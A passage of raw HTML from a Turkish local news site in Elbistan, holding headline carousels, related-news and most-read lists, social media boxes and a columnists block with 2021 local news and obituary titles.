      <a href="http://www.elbistaninsesi.com/guncel/33-mahallede-800-kinali-keklik-dogaya-kanat-cirpti-h70615.html" title="33 mahallede 800 kınalı keklik doğaya kanat çırptı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/33_mahallede_800_kinali_keklik_dogaya_kanat_cirpti_h70615_d3acd.jpg" alt="33 mahallede 800 kınalı keklik doğaya kanat çırptı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">33 mahallede 800 kınalı keklik doğaya kanat çırptı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasta-haftalik-vaka-sayisi-yukseldi-h70622.html" title="Kahramanmaraş’ta haftalık vaka sayısı yükseldi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/kahramanmarasta_haftalik_vaka_sayisi_yukseldi_h70622_180aa.jpeg" alt="Kahramanmaraş’ta haftalık vaka sayısı yükseldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş’ta haftalık vaka sayısı yükseldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/LGSde+ba%C5%9Far%C4%B1l%C4%B1+olan+%C3%B6%C4%9Frenciler+%C3%B6d%C3%BCllendirildi" title="LGSde Başarılı Olan öğrenciler ödüllendirildi haberleri">LGSde Başarılı Olan öğrenciler ödüllendirildi</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kisitlamasiz-ilk-bayram-heyecani-carsi-pazara-da-yansidi-h70651.html"  title="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/kisitlamasiz_ilk_bayram_heyecani_carsi_pazara_da_yansidi_h70651_2df20.jpg" alt="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı" />
        <span>Kısıtlamasız ilk bayram heyecanı çarşı pazara...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kuraklik-magduru-ciftcinin-gozu-kulagi-tarsimde-h70649.html"  title="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/kuraklik_magduru_ciftcinin_gozu_kulagi_tarsimde_h70649_31a60.jpg" alt="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de" />
        <span>Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html"  title="Elbistan, müzik ve sanat bayramı için gün sayıyor">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/elbistan_muzik_ve_sanat_bayrami_icin_gun_sayiyor_h70648_917b8.jpg" alt="Elbistan, müzik ve sanat bayramı için gün sayıyor" />
        <span>Elbistan, müzik ve sanat bayramı için gün sayıyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/iclal-erginoz-92-yasinda-h70647.html"  title="İclal Erginöz 92 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/iclal_erginoz_92_yasinda_h70647_36aaf.jpg" alt="İclal Erginöz 92 yaşında" />
        <span>İclal Erginöz 92 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/arilar-kentin-en-islek-caddesinde-agaca-ogul-verdi-h70646.html"  title="Arılar kentin en işlek caddesinde ağaca oğul verdi">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/arilar_kentin_en_islek_caddesinde_agaca_ogul_verdi_h70646_ed720.jpg" alt="Arılar kentin en işlek caddesinde ağaca oğul verdi" />
        <span>Arılar kentin en işlek caddesinde ağaca oğul verdi</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/total-kalitesi-ve-ayricaligi-elbistanda-h70643.html"  title="TOTAL kalitesi ve ayrıcalığı Elbistan’da">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/total_kalitesi_ve_ayricaligi_elbistanda_h70643_15782.jpg" alt="TOTAL kalitesi ve ayrıcalığı Elbistan’da" />
        <span>TOTAL kalitesi ve ayrıcalığı Elbistan’da</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/4kattaki-evinin-penceresinden-dusen-38-yasindaki-adam-hayatini-h70642.html"  title="4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/4kattaki_evinin_penceresinden_dusen_38_yasindaki_adam_hayatini_kaybetti_h70642_876b7.jpg" alt="4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti" />
        <span>4.kattaki evinin penceresinden düşen 38 yaşındaki...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/polisten-bayrama-magdur-girmeyin-uyarisi-h70640.html"  title="Polisten ‘bayrama mağdur girmeyin’ uyarısı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/polisten_bayrama_magdur_girmeyin_uyarisi_h70640_9d504.jpg" alt="Polisten ‘bayrama mağdur girmeyin’ uyarısı" />
        <span>Polisten ‘bayrama mağdur girmeyin’ uyarısı</span>
      </a>
    </div>
      </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/otomobil-sarampole-yuvarlandi-1-olu-h70614.html" title="Otomobil şarampole yuvarlandı 1 ölü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/otomobilin_sarampole_yuvarladi_1_olu_h70614_bde2e.jpg" alt="Otomobil şarampole yuvarlandı 1 ölü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/otomobil-sarampole-yuvarlandi-1-olu-h70614.html" title="" ><span class="en-hit">1.</span> <strong>Otomobil şarampole yuvarlandı 1 ölü</strong> <span class="en-spot en-hidden">Kayseri’nin Pınarbaşı ilçesinde sürücüsünün direksiyon hakimiyetini...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/tasima-komur-dev-santralin-disinin-kovuguna-yetmedi-h70392.html" title="Taşıma kömür dev santralin ‘dişinin..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/tasima_komur_dev_santralin_disinin_kovuguna_yetmedi_h70392_a23ca.jpg" alt="Taşıma kömür dev santralin ‘dişinin..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/tasima-komur-dev-santralin-disinin-kovuguna-yetmedi-h70392.html" title="" ><span class="en-hit">2.</span> <strong>Taşıma kömür dev santralin ‘dişinin...</strong> <span class="en-spot en-hidden">1100 kilometre uzaktaki Manisa’nın Soma ilçesinden yaklaşık 9 bin...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bicerdover-fiyatlari-belirlendi-2-h70465.html" title="Biçerdöver fiyatları belirlendi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/bicerdover_fiyatlari_belirlendi_h70465_c6bea.jpg" alt="Biçerdöver fiyatları belirlendi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicerdover-fiyatlari-belirlendi-2-h70465.html" title="" ><span class="en-hit">3.</span> <strong>Biçerdöver fiyatları belirlendi</strong> <span class="en-spot en-hidden">Elbistan Ziraat Odası, 2021 hasat döneminde geçerli olacak biçerdöver...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-celik-montaj-ustasi-is-kazasinda-hayatini-kaybetti-h70594.html" title="Elbistanlı çelik montaj ustası iş..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/elbistanli_celik_montaj_ustasi_is_kazasinda_hayatini_kaybetti_h70594_34b1b.jpg" alt="Elbistanlı çelik montaj ustası iş..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-celik-montaj-ustasi-is-kazasinda-hayatini-kaybetti-h70594.html" title="" ><span class="en-hit">4.</span> <strong>Elbistanlı çelik montaj ustası iş...</strong> <span class="en-spot en-hidden">Niğde’de çalıştığı inşaatta iş kazası geçiren Elbistanlı...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sevcihan-kecebir-51-yasinda-h70459.html" title="Sevcihan Keçebir 51 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/sevcihan_kecebir_51_yasinda_h70459_5cbca.jpg" alt="Sevcihan Keçebir 51 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sevcihan-kecebir-51-yasinda-h70459.html" title="" ><span class="en-hit">5.</span> <strong>Sevcihan Keçebir 51 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/sevcihan-kecebir-51-yasinda-h70459.html" title="Sevcihan Keçebir 51 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/sevcihan_kecebir_51_yasinda_h70459_5cbca.jpg" alt="Sevcihan Keçebir 51 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sevcihan-kecebir-51-yasinda-h70459.html" title="" ><span class="en-hit">1.</span> <strong>Sevcihan Keçebir 51 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-keser-64-yasinda-h70366.html" title="Mehmet Keser 64 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/mehmet_keser_64_yasinda_h70366_10474.jpg" alt="Mehmet Keser 64 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-keser-64-yasinda-h70366.html" title="" ><span class="en-hit">2.</span> <strong>Mehmet Keser 64 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/kadir-kul-h70567.html" title="Kadir Kul" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/kadir_kul_h70567_3bcad.jpg" alt="Kadir Kul"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/kadir-kul-h70567.html" title="" ><span class="en-hit">3.</span> <strong>Kadir Kul</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sebahattin-eser-90-yasinda-h70425.html" title="Sebahattin Eser 90 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/sebahattin_eser_90_yasinda_h70425_46b23.jpg" alt="Sebahattin Eser 90 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sebahattin-eser-90-yasinda-h70425.html" title="" ><span class="en-hit">4.</span> <strong>Sebahattin Eser 90 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/asir-fidan-61-yasinda-h70399.html" title="Aşir Fidan 61 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/asir_fidan_61_yasinda_h70399_52745.jpg" alt="Aşir Fidan 61 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/asir-fidan-61-yasinda-h70399.html" title="" ><span class="en-hit">5.</span> <strong>Aşir Fidan 61 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/azazen-ki-makale,6264.html" title="Azazen ki" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="http://www.elbistaninsesi.com/azazen-ki-makale,6264.html" title="Azazen ki" >Azazen ki</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-7-makale,6263.html" title="TECRÜBE İLE SABİT -7-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-7-makale,6263.html" title="TECRÜBE İLE SABİT -7-" >TECRÜBE İLE SABİT -7-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yobazlik-makale,6262.html" title="YOBAZLIK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/yobazlik-makale,6262.html" title="YOBAZLIK" >YOBAZLIK</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/su-yasamak-makale,6261.html" title="ŞU YA­ŞA­MAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/su-yasamak-makale,6261.html" title="ŞU YA­ŞA­MAK" >ŞU YA­ŞA­MAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/rahatlik-makale,6260.html" title="RA­HAT­LIK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/rahatlik-makale,6260.html" title="RA­HAT­LIK" >RA­HAT­LIK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/gozlerin-makale,6259.html" title="Göz­le­rin " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/gozlerin-makale,6259.html" title="Göz­le­rin " >Göz­le­rin </a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >Prof.Dr.Fuat Sezgin’in Ardından -5-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/olum-hayatin-gercegi-makale,6257.html" title="ÖLÜM HAYATIN GERÇEĞİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nermin-yılmaz-akbalaban.jpg" alt="Nermin Yılmaz Akbalaban">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/96/nermin-yilmaz-akbalaban" title="Nermin Yılmaz Akbalaban">Nermin Yılmaz Akbalaban</a></h4>
              <a href="http://www.elbistaninsesi.com/olum-hayatin-gercegi-makale,6257.html" title="ÖLÜM HAYATIN GERÇEĞİ" >ÖLÜM HAYATIN GERÇEĞİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uzun-carsi-60-70-ve-80lerin-esnaflari-makale,6256.html" title="Uzun Çarşı (60-70 ve 80’lerin esnafları)" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="http://www.elbistaninsesi.com/uzun-carsi-60-70-ve-80lerin-esnaflari-makale,6256.html" title="Uzun Çarşı (60-70 ve 80’lerin esnafları)" >Uzun Çarşı (60-70 ve 80’lerin esnafları)</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neylesin-makale,6251.html" title="NEY­LESİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="http://www.elbistaninsesi.com/neylesin-makale,6251.html" title="NEY­LESİN" >NEY­LESİN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hayatima-dokunan-haller-makale,6250.html" title="HAYATIMA DOKUNAN HALLER" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/hayatima-dokunan-haller-makale,6250.html" title="HAYATIMA DOKUNAN HALLER" >HAYATIMA DOKUNAN HALLER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/medar-i-iftiharimiz-cumhurbaskanimiz-baskomutanimiz-sayin-recep-tayyip-erdogan-dan-elbistan-cevresi-bolgesi-dolayisiyla-11-ilcesiyle-birlikte-kahramanmaras-halkinin-allah-rizasi-icin-arz-talep-ve-istirhamini-arzediyor-6-bolge-tesvikinden-yararlanmak-istiy" title="MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!" >MEDAR-I İFTİHARIMIZ, CUMHURBAŞKANIMIZ, BAŞKOMUTANIMIZ, SAYIN RECEP TAYYİP ERDOĞAN&#039;DAN; ELBİSTAN, ÇEVRESİ, BÖLGESİ, DOLAYISIYLA: 11 İLÇESİYLE BİRLİKTE KAHRAMANMARAŞ HALKININ; ALLAH RIZASI İÇİN: ARZ,  TALEP VE İSTİRHAMINI ARZEDİYOR; 6. BÖLGE TEŞVİKİNDEN YARARLANMAK İSTİYOR!</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kulturel-emperyalizmin-toplumsal-etkileri-makale,6247.html" title="KÜLTÜREL EMPERYALİZMİN TOPLUMSAL ETKİLERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="http://www.elbistaninsesi.com/kulturel-emperyalizmin-toplumsal-etkileri-makale,6247.html" title="KÜLTÜREL EMPERYALİZMİN TOPLUMSAL ETKİLERİ" >KÜLTÜREL EMPERYALİZMİN TOPLUMSAL ETKİLERİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/İsimsiz-2.jpg" alt="Hatice Bacaklı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/99/hatice-bacakli" title="Hatice Bacaklı">Hatice Bacaklı</a></h4>
              <a href="http://www.elbistaninsesi.com/sorular-makale,6245.html" title="SORULAR" >SORULAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/vahametin-acmazi-makale,6237.html" title="VAHAMETİN AÇMAZI" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
